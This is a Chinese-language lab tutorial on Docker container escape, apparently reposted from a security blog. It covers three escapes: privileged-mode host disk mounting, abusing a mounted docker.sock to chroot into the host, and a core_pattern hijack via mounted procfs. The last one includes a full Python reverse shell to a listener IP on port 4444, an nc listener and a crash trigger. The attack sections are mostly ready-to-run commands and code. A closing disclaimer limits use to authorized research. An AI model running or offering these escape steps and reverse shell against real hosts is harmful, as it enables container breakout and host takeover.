云原生-docker逃逸
➢特权模式
➢危险挂载逃逸
文章参考:
https://wiki.teamssix.com/CloudNative/
一.docker—特权模式逃逸
原理:
用户在启动镜像使,赋予了镜像root特权启动,导致容器里面的用户可以执行危险指令,例如通过将本地主机的盘挂载到容器里面,从而实现逃逸
启动靶场:
dockerrun--rm--privileged=true-italpine
默认会直接进入容器,如果没有则使用命令进入
查看容器编号
dockerps进入容器
dockerexec-it编号 /bin/sh检测是否是docker环境:
cat/proc/1/cgroup|grep-qidocker&&echo"Is Docker"||echo"Not Docker"或者直接根目录执行ls -alh,出现.docekrenv说明是docker判断是否是特权:
cat/proc/self/status|grepCapEff如果是00000001fffffffff说明是特权
查看目录:
fdisk-l
可知当前我们处于sda1盘
实现特权逃逸:
将sda3盘挂载到/test文件夹
mkdir/test2&&mount/dev/sda3 /test2判断结果:
cd/test/&&ls成功逃逸到主机
二.docker—危险挂载逃逸
1、挂载Docker Socket逃逸
原理:
docker socket是什么?
Docker daemon 通过一个 Unix socket 提供 API:
/var/run/docker.sockdocker cli实际上是通过调用这个api实现控制docker的
例如docker run,docker ps,都是通过socket 发送http请求
所以当用户将/var/run/docker.sock挂载进docker时,攻击者只要在docker里面再安装docker调用该api就可以实现将本地主机挂载到新的docker容器
启动靶场:
dockerrun-itd--namewith_docker_sock-v/var/run/docker.sock:/var/run/docker.sock ubuntu进入环境:
dockerexec-itwith_docker_sock /bin/bash检测环境:
ls-lah/var/run/docker.sock挂载逃逸:
更新apt源并安装curl
apt-getupdateapt-getinstallcurl一键安装docker
curl-fsSLhttps://get.docker.com/|sh在容器内部创建一个新的容器,并将宿主机目录挂载到新的容器内部
dockerrun-it-v/:/host ubuntu /bin/bashchroot/host可能会报错类似Error response from daemon: client version 1.54 is too new. Maximum supported API version is 1.39
是由于客户端太新,而服务端太旧,所以docker无法调用。
解决指令:手动指定 API 版本export DOCKER_API_VERSION=1.39
成功将主机在容器里面的新容器挂载:
2、挂载宿主机procfs逃逸
原理:
本质:利用Linux 的/proc虚拟文件系统获取或修改宿主机进程信息,从而进入宿主机的namespace。/proc记录的是内核和进程信息。
如果容器可以访问宿主机的/proc,就可能:
- 找到宿主机进程
- 进入该进程的
namespace - 获得宿主机
root
文章推荐
https://github.com/Metarget/metarget/tree/master/writeups_cnv/mount-host-procfs
启动环境:
dockerrun-it-v/proc/sys/kernel/core_pattern:/host/proc/sys/kernel/core_pattern ubuntu检测环境:
find/-namecore_pattern查找路径:
将输出的id号复制
(workdir)cat/proc/mounts|grepdocker替换这里的id号
/var/lib/docker/overlay2/32d054bc957db346520de8c8cef1565c264f702034b184140546e5c33997da91/merged构造文件
echo-e"|/var/lib/docker/overlay2/3c89403d33bef696784f67e1d546d97a6a49178d2323caa804a7e647793558a2/merged/tmp/.x.py\rcore ">/host/proc/sys/kernel/core_pattern写入反弹文件:
替换lhost和lport为自己的主机
cat>/tmp/.x.py<<EOF #!/usr/bin/python import os import pty import socket lhost = "10.22.167.164" lport = 4444 def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((lhost,lport))os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) os.putenv("HISTFILE", '/dev/null') pty.spawn("/bin/bash") os.remove('/tmp/.x.py') s.close() if __name__ == "__main__": main() EOF启动监听:
nc-lvvp4444赋予可执行权限
chmod+x /tmp/.x.py创建触发错误的程序
cat>/tmp/x.c<<EOF #include <stdio.h> int main(void) { int *a = NULL; *a = 1; return 0; } EOF编译
如果docker中没有可以自己编译后上传上去
gcc /tmp/x.c-ox执行文件:
./x模拟真实场景:
1、高权限-Web入口到Docker逃逸(Java)
dockerrun--rm--privileged=true-it-p8888:8080 vulfocus/shiro-7212、低权限-Web入口到Docker逃逸(PHP)
dockerrun--rm--privileged=true-it-p8080:80 sagikazarmark/dvwa免责声明
本文所述漏洞复现过程仅用于安全研究与教育目的,旨在提升对软件安全风险的认知与防御能力。所有操作均应在合法授权的隔离实验环境中进行,严禁用于任何未授权的系统渗透、攻击或非法活动。作者及发布方不对因误用、滥用本文内容而导致的任何直接或间接损失承担责任。用户须自行承担使用风险,并严格遵守《中华人民共和国网络安全法》及相关法律法规。